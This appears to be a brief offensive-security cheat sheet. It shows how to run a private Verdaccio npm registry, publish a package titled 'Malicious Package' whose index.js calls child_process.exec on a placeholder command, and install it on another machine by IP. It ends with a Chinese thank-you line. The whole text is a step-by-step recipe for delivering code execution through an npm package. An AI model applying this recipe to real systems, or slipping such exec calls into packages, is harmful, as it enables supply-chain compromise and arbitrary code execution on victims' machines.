Private Npm Registry & Publish Malicious Package

Pull down by docker: docker pull verdaccio:verdaccio
Start service: docker run -it --rm -p 4873:4873 verdaccio/verdaccio
Adduser: npm adduser --registry http://127.0.0.1:4873/, use --auth-type=legacy if npm@9
Create local package:
- mkdir -p imqwe; cd imqwe; npm init
- echo "require('child_process').exec('<cmd>')" > index.js
Publish customized package: npm publish --registry http://127.0.0.1:4873/
Install this package from remote: npm install imqwe --registry http://<IP>:4873/

感谢您的支持，我会继续努力的!